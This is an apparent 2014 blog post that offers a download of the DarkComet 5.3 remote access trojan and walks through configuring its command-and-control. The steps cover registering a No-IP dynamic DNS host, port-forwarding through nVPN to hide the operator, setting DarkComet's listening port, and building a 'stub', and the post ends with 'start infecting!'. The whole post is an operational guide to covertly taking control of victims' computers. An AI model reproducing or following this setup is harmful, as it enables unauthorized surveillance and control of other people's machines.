Saturday, 26 April 2014

DarkComet Rat 5.3

                  DarkComet Rat 5.3

Download Link : Download DarkComet 5.3 Free


Quick intro on how to connect to Darkcomet via nVPN

What you need:

  • A No-Ip Acccount
  • Simple knowledge
  • nVpn Account

1.First make sure you have Darkcomet-RAT installed once you have it installed leave it.

2.Go to no-ip.com and register an No-ip Account [Image: logo.png]

3.Go to manage hosts and create a DNS Host just put an a Host name doNo-ip.biz and press Ok.

[Image: 49a56d8dbe7a9e0b4d981a3769e3687b.png]

4.Download no-ip Duc @ http://www.no-ip.com/downloads.php?page=winand Once you downloaded it open it up and Login and Add your host.

[Image: pzhcsj6v5h71ldiibflv.png]

5.Now to portforward your VPN go to http://www.nvpn.net and go to Client Area and Login.

[Image: c4293803bb35cbd5a589e104da77aafd.png]

6.Once you're logged go to Portforwarding and you should get this.

[Image: e92907d70535ebb2217cbf37bddf3d34.png?1354317738]

7.Add port "200" to it Refresh and make sure its there wait a few minutes so it activates...

8.Okay now that you're done with this go to Darkcomet and go to Socket/Net.

[Image: 9b81dfc0420d1718f1bc91fa8817a577.png?1354317855]

9.Go there and add port "200" and you should get this.

[Image: 8536a4be6789e396c8b54b9340f4ad47.png?1354317911]

10.Congratulations! It works but we're not done just yet now go to Darkcomet-RAT Top left cornor.

Spoiler (Click to Hide)
[Image: 37c61cfe3e493a3be8fa7eab7e754ff8.png?1354318000]

11. Go to "Client Settings" and add your No-IP information and click update.

[Image: fc80001cf6f2b3087622394645f7788d.png?1354318123]

12.Once that's done you can create your stub and start infecting!


Make sure when you go to Darkcomet-RAT>Sever module>Server(Expert) at network settings add your no-ip and port, which is No-ip.no-ip.biz & 200.(Only when you create your stub once your Stub is created you can leave that blank.)
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